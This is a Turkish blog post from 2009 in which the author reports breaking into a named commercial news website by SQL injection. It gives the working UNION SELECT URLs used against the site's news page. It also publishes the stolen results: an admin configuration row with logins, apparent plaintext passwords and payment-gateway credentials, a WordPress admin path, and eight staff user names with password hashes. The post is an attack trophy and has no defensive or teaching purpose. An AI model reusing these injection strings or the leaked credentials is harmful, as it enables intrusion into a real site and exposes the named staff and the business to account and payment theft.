10 Aralık 2009 Perşembe

tapsns.com SQL İNJECTİON

Gece gece bir siteye denk geldim ben çektikçe o geliyor ben çektikçe o geliyor biz bu sql' ile bilgiler çekerken bu kadar ugraşıyorsak bide script kodluyanların table , column'ları ayarlıyanların halini düşünmek gerek isyan ediyorlardır tahminimce.Sözü uzatmıyorum buyrun site ve bilgiler biraz karışık bir durum oldu ama idare edin artık :):)


admin:142857sn@!:bin32cgi!!:d:/wwwroot/orders:http://www.tapsns.com/orders/:https://www.tapsns.com/orders/:signups@tapsns.com:::$::0:30::Strategic News Service::N N N N N:D:\wwwroot\payflowpro\win32\bin\pfpro:8:tapsns2:i#3yF_VmT?


http://www.tapsns.com/news.php?newsid=-12 UNION SELECT 1,concat(setup_login,0x3a,setup_password,0x3a,setup_superuser,0x3a,setup_path,0x3a,setup_url,0x3a,setup_ssl_url,0x3a,setup_email,0x3a,setup_email_signup,0x3a,setup_email_admin,0x3a,setup_currency,0x3a,setup_tax,0x3a,setup_tax_rate,0x3a,setup_max_results,0x3a,setup_domain_suggest,0x3a,setup_company,0x3a,setup_affiliate,0x3a,setup_aff_type,0x3a,setup_curl,0x3a,setup_gateway,0x3a,setup_gw_userid,0x3a,setup_gw_password),3 from setup


http://www.tapsns.com/news.php?newsid=-12 UNION SELECT 1,group_concat(user_login,0x3a,user_pass),3 from wp_users


http://www.tapsns.com/blog/wp-admin/


Mark:$P$BRxKZ7Xyc8Pt92NnzcozYmT4/E8vJa1

scott:$P$BbJcWc1NFZ86s0Nh3nW34JSkGthlrr1

Steve:$P$BYjQ8IVc4UPLc52YLFaPj4puddoIok.

russ:$P$BmuSBmeLkHtvbHcg5lmQuU5iv5RzsP1

Tim:$P$BZG3yGoMEUbkPygxTJ6HsmXuB3yA3Z/

sharon:$P$B1Xl.YQlzDLFvjjLdeaEcoGFqKj1fE/

Simon:$P$BdH3nVHd05JBIo5uxxpdV0Hmy8itol/

ricardo:$P$BedYLz8VceSfscFlDuTydXRC8Oj73M1

Hiç yorum yok :

Yorum Gönder